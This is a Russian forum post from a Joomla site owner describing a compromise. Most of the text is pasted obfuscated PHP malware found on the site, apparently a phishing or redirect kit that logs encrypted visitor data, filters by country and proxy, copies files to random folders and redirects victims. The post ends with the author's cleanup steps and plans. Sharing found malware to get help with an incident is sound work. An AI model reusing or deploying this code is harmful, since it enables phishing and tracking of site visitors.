"\111\x4e\x56\x41\x4c\x49\x44\103\x4f\x44\x45\x7c\x4e\x55\x4c\x4c\174\x4e\125\114\114\x7c\116\x55\114\114\x7c\116\125\x4c\x4c\174\x4e\125\x4c\x4c\174\116\x55\x4c\114\x7c\x4e\x55\114\114\x7c\116\125\114\114\x7c{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\174\116\x55\x4c\x4c\174\116\125\114\x4c\x7c{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\174{$AFBQyywgAePKQWno}\x7c{$PPGFSAmSVYLz6tME}\xa"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\12", FILE_APPEND); goto qytB9dDz6In4CUZX; q8oo15W01_OLdL77: $ubxJp4_tyNnuMJAy = "\x49\x4e\x56\101\x4c\111\104\x43\117\104\105\174\116\125\114\114\174\x4e\125\114\114\x7c\116\125\x4c\114\x7c\116\x55\114\114\174\x4e\x55\114\x4c\x7c\116\125\x4c\x4c\174\x4e\x55\114\114\174\116\x55\x4c\114\174{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\x7c\x4e\125\114\x4c\x7c\x4e\x55\x4c\x4c\174{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\x7c{$AFBQyywgAePKQWno}\x7c{$PPGFSAmSVYLz6tME}\12"; goto VN2NFhq35urROeIR; zGkKlkGtPC00Ltwh: $dkVPB8sifY1rcOxF++; goto cYOq0hLul_vGdewU; MVqLHs4ugSK3TEdL: $BBxBUKeBp7m0i1dK = d3m8uJU4SCaPpWev . xF7O0PQ2ISFbU81E; $EADfbuBD_qh1qr7e = $Z5D6Pa56bNs_fE0y[array_rand($Z5D6Pa56bNs_fE0y)]; $TGXcbPTN_tArd5cm = "\56\56\57" . strtolower($qYcidWtGQjUQ7lrq) . "{$EADfbuBD_qh1qr7e}" . $qiksIe0N8tsOPw6_; $raBIirA9ZTY2Ep8c = $_SESSION["\114\123\124\x43\x52"] = $TGXcbPTN_tArd5cm . tBIA6GOWwOIJUhVM; goto BVKlZxvWrh0u6MjH; NQP5TSZXDqTCFmbI: @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\x3d", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); goto DXhJsEZP8enwkqcP; AWEXxuFVbLzABb07: $ubxJp4_tyNnuMJAy = "\102\101\x44\103\117\125\116\124\122\131\174{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\174{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\x7c{$Lr655u_B0N6Sttmp}\x7c\x4e\125\x4c\x4c\174{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\174\116\125\114\114\174\116\x55\114\114\x7c{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\174\116\x55\x4c\114\174\116\125\114\x4c\174\xa"; $wU4CtVKqM6Z_orXF = "\102\x61\x64\40\x43\x6f\x75\x6e\x74\x72\x79\x3a\x28{$xVN5Lg9mV40ArM_5}\174{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\x7c{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\174\163\145\163\x73\x69\157\x6e\151\144\72{$hVGFv1XNqPS33K6i}\174{$raBIirA9ZTY2Ep8c}\174{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\51\12\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); @file_put_contents(d3m8uJU4SCaPpWev . U8XdY3zTWrvgiVsY, $wU4CtVKqM6Z_orXF, FILE_APPEND); goto baCdrD6OF8GywoD3; BVKlZxvWrh0u6MjH: mkdir($TGXcbPTN_tArd5cm, 0755); foreach ($Sy1x6yU9hKPX4lW2 = new \RecursiveIteratorIterator(new \RecursiveDirectoryIterator($BBxBUKeBp7m0i1dK, \RecursiveDirectoryIterator::SKIP_DOTS), \RecursiveIteratorIterator::SELF_FIRST) as $ZQat8eWaGQnQh3ZV) { goto VhVLpHkRK2ecxKgQ; ClEqj2uSwN3zQIYf: goto F8HQd2XUR31pcYR2; mjc2n11Vh_HEWQ4t: goto ehRrCYod7yJrYGyt; ScT61u1fTOv1bE0o: OobbuPvR6ARS406e: goto k4Zdl9JR0R1Pg_qo; VhVLpHkRK2ecxKgQ: if ($ZQat8eWaGQnQh3ZV->isDir()) { goto mjc2n11Vh_HEWQ4t; } copy($ZQat8eWaGQnQh3ZV, $TGXcbPTN_tArd5cm . DIRECTORY_SEPARATOR . $Sy1x6yU9hKPX4lW2->getSubPathName()); goto ClEqj2uSwN3zQIYf; ehRrCYod7yJrYGyt: mkdir($TGXcbPTN_tArd5cm . DIRECTORY_SEPARATOR . $Sy1x6yU9hKPX4lW2->getSubPathName()); F8HQd2XUR31pcYR2: goto ScT61u1fTOv1bE0o; k4Zdl9JR0R1Pg_qo: } qSDGB4QN0exKMX6f: if (oAlFTiwTmnzjiXeE == 1) { goto zAS1d1CkDa8kSZHa; } $ubxJp4_tyNnuMJAy = "\x47\x4f\117\104\x7c{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\174{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\174\116\125\114\114\174{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\174{$hVGFv1XNqPS33K6i}\x7c{$raBIirA9ZTY2Ep8c}\x7c{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\174\156\165\x6c\154\x7c\x6e\x75\x6c\154\174\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); goto er2pPFBAtq0bE62u; goto orK3AivAQsiN342e; cMv0TON_ItRNG9Gs: $fCfsgl9hhOt4M8Yv = str_replace("\137\x2d", '', $LpkEAMi3e3fZ1o5y[1]); goto hjHqO93riDVsmGvB; uI63ZmtQ1rS6MDR1: $fCfsgl9hhOt4M8Yv = empty($LpkEAMi3e3fZ1o5y[1]) ? "\x49\x4e\126\x43\x4f\104\72\x20\105\115\x50\124\x59\x5f\x31" : "\x49\x4e\x56\x43\x4f\104\x3a\40" . urlencode($LpkEAMi3e3fZ1o5y[1]); hjHqO93riDVsmGvB: $B1VgpM0YzVmb61xU = preg_match_all("\x2f\x5f\55\57", $LpkEAMi3e3fZ1o5y[2], $Wa3kd33BWfIKtWd5); if (!isset($LpkEAMi3e3fZ1o5y[2]) || empty($LpkEAMi3e3fZ1o5y[2]) || !preg_match_all("\57\x5e\x5f\x2d\57", $LpkEAMi3e3fZ1o5y[2]) || !preg_match_all("\57\137\x2d\44\57", $LpkEAMi3e3fZ1o5y[2]) || count($Wa3kd33BWfIKtWd5[0]) != 2) { goto f4rs1iHbu8JZu7Yx; } goto zC3fK33AoI3OPYtM; ma_f6RnexcryHWNJ: $dkVPB8sifY1rcOxF = 0; $LWUMFJ3UUB2zAOZl = strlen($M005LeiOd5vDOCre = "\x61\142\x63\144\163\x66\172\x6e\153\147\x68\x69\x6a\147\154\151\x70\161\x6e\167\x65\x72\x30\61\x32\63\64\65\x36\x37\70\71") - 1; cYOq0hLul_vGdewU: if (!($dkVPB8sifY1rcOxF != 9)) { goto MVqLHs4ugSK3TEdL; } zQQ5NSKXugcwUSRN: $wyny0ulEwYUhGJd1 = rand(0, $LWUMFJ3UUB2zAOZl); $qiksIe0N8tsOPw6_ .= $M005LeiOd5vDOCre[$wyny0ulEwYUhGJd1]; goto zGkKlkGtPC00Ltwh; bKTjGD2P0BG__sO1: include_once "\56\56\x2f\163\161\163\151\x74\x75\x6b\x6d\151\x79\x61\x66\x79\x79\154\170\164\x79\x6f\x61\x69\x64\171\141\57\152\x65\x73\x69\141\x7a\164\x67\166\x2e\160\x68\x70"; $H9F7SySTOr0dmxZz = $_SERVER["\x52\x45\x51\x55\105\123\x54\x5f\x55\x52\x49"]; if (defined("\x64\x33\x6d\70\x75\112\125\64\123\103\141\120\x70\127\145\x76")) { goto r20REOxKHKZ8t30T; } die; r20REOxKHKZ8t30T: $DQojtsvxo5HU2vt9 = "\112\124\112\103"; $v0L9c3a7CB2rFfmn = "\x4a\x54\112\x47"; goto Z89Il_9JdqvIak_M; KiYndqABDLSw7lPb: @file_put_contents(d3m8uJU4SCaPpWev . U8XdY3zTWrvgiVsY, $wU4CtVKqM6Z_orXF, FILE_APPEND); xEBzQagECZSzZEEG: file_put_contents(d3m8uJU4SCaPpWev . Paep5zA_6AXVwSd7, $N18zQYn3mXKLQAya . "\xa", FILE_APPEND); file_put_contents(d3m8uJU4SCaPpWev . yDIWjLoQVkh9MQyQ, $N18zQYn3mXKLQAya . "\12", FILE_APPEND); include_once d3m8uJU4SCaPpWev . LMErg0ZYgdeYwBBg; die; goto A8SNkJMJtk7_ppzQ; zbIROZJRQxURoMGa: @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\x3d", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\12", FILE_APPEND); @file_put_contents(d3m8uJU4SCaPpWev . U8XdY3zTWrvgiVsY, $wU4CtVKqM6Z_orXF, FILE_APPEND); O9upWssTnfe3S1c9: header("\x4c\117\x43\x41\124\x49\x4f\116\x3a\40{$raBIirA9ZTY2Ep8c}"); goto Y3CTuSmTb4CbRbC3; fEMw945I_Bt1DyJu: $qiksIe0N8tsOPw6_ = ''; goto ma_f6RnexcryHWNJ; dEV9AmMSJCWx04vp: @file_put_contents(d3m8uJU4SCaPpWev . U8XdY3zTWrvgiVsY, $wU4CtVKqM6Z_orXF, FILE_APPEND); xWuvFm8_hHsA6AU9: file_put_contents(d3m8uJU4SCaPpWev . Paep5zA_6AXVwSd7, $N18zQYn3mXKLQAya . "\xa", FILE_APPEND); file_put_contents(d3m8uJU4SCaPpWev . yDIWjLoQVkh9MQyQ, $N18zQYn3mXKLQAya . "\xa", FILE_APPEND); include_once d3m8uJU4SCaPpWev . LMErg0ZYgdeYwBBg; die; Z5pIIWRIeDnZAabd: goto te_gBnS2FEpgvqIb; olobdQBq6umc_iaA: Y3CTuSmTb4CbRbC3: X1NO87S9kz911y31: GhJAlFk9MPFtycf1: oMF0wGX2u_4e96bF: goto zeyjibIhlKJOC1wR; sfjum6mpBVC4x97W: if (oAlFTiwTmnzjiXeE == 1) { goto C7UXfrAIjUMfBb0j; } goto DRMoXSx8DWZyHkn8; KAEzYFjNh4DC2Whi: $ubxJp4_tyNnuMJAy = "\x42\x41\104\120\x52\x4f\130\x7c{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\174{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\x7c{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\174\x4e\125\114\x4c\174{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\174\116\x55\x4c\x4c\174\116\125\x4c\114\174{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\174\x4e\x55\x4c\x4c\174\116\125\x4c\114\174\xa"; $wU4CtVKqM6Z_orXF = "\102\141\144\x20\120\x72\x6f\170\x79\x3a\x28{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\x7c{$gr0JtUNx3TpNAGJF}\174{$XfCNpEdlB2QE7wbC}\x7c{$Lr655u_B0N6Sttmp}\174{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\174\x73\145\163\163\x69\157\156\x69\144\x3a{$hVGFv1XNqPS33K6i}\x7c{$raBIirA9ZTY2Ep8c}\174{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\x29\12\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\12", FILE_APPEND); @file_put_contents(d3m8uJU4SCaPpWev . U8XdY3zTWrvgiVsY, $wU4CtVKqM6Z_orXF, FILE_APPEND); JSdAJ7W1QCMP5y4Q: file_put_contents(d3m8uJU4SCaPpWev . Paep5zA_6AXVwSd7, $N18zQYn3mXKLQAya . "\xa", FILE_APPEND); file_put_contents(d3m8uJU4SCaPpWev . yDIWjLoQVkh9MQyQ, $N18zQYn3mXKLQAya . "\12", FILE_APPEND); goto X3reL_CU4q4nQPbj; Z89Il_9JdqvIak_M: $H9F7SySTOr0dmxZz = str_replace($zMIw7Pu4JQSUS753, base64_decode($DQojtsvxo5HU2vt9), $H9F7SySTOr0dmxZz); $H9F7SySTOr0dmxZz = str_replace($no3Z1gbeOwoD1dGr, base64_decode($v0L9c3a7CB2rFfmn), $H9F7SySTOr0dmxZz); $G34qBtxgzEcLvUBA = explode("\77", $H9F7SySTOr0dmxZz); $AFBQyywgAePKQWno = empty($G34qBtxgzEcLvUBA[1]) ? "\x4e\117\x4e\x45" : urldecode($G34qBtxgzEcLvUBA[1]); if (!isset($G34qBtxgzEcLvUBA[1]) || isset($G34qBtxgzEcLvUBA[2])) { goto sfjum6mpBVC4x97W; } $PPGFSAmSVYLz6tME = rc4two($AFBQyywgAePKQWno, $mRQVCD0vyT_gjSVw, $TLfeKQXYbiXCTf38 = false); $RQHgsfMXa3piPeWa = preg_match_all("\x2f\73\x2c\57", $PPGFSAmSVYLz6tME, $t1S0nW1oSlYlrVY6); goto zC9a68sqxx1tkXlV; onONIUOA_ezrfNPi: $xVN5Lg9mV40ArM_5 = str_replace("\137\x2d", '', str_replace("\72\x3a", '', $LpkEAMi3e3fZ1o5y[0])); goto v_Thgl3i3Cmbk3tL; SAQHTDk_uDGaCoQ3: $xVN5Lg9mV40ArM_5 = empty($LpkEAMi3e3fZ1o5y[0]) ? "\111\116\x56\103\x4f\104\x3a\40\x45\115\120\x54\x59\137\60" : "\x49\x4e\x56\x43\x4f\104\x3a\40" . urlencode($LpkEAMi3e3fZ1o5y[0]); v_Thgl3i3Cmbk3tL: $XW6FmUGPmY_C3SFF = preg_match_all("\57\137\55\57", $LpkEAMi3e3fZ1o5y[1], $WsPgmWNvjwdh3HQk); if (!isset($LpkEAMi3e3fZ1o5y[1]) || empty($LpkEAMi3e3fZ1o5y[1]) || !preg_match_all("\57\x5e\x5f\55\57", $LpkEAMi3e3fZ1o5y[1]) || !preg_match_all("\x2f\137\x2d\44\57", $LpkEAMi3e3fZ1o5y[1]) || count($WsPgmWNvjwdh3HQk[0]) != 2) { goto uI63ZmtQ1rS6MDR1; } goto cMv0TON_ItRNG9Gs; A8SNkJMJtk7_ppzQ: zeyjibIhlKJOC1wR:
Мой конфиг Joomla:
Joomla! 3.9.14
Что сделал?
- забекапил все как есть себе в архив
- почистил от гадства файлов и папок
- обновил Joomla
- накинул RSFirewal
- проверил поправил Chmod и конфиг
- поменял пароли
Что планирую?
- смотреть логи за те числа когда создались файл
- смотреть по компоненах что и как
- искать бекдор
- ну еще всякое амм по мелачам
Вот сопственно такие дела. У кого что такое случалось?
П.С. Продолжение будет
П.П.С. Вовремя обновляйтесь ))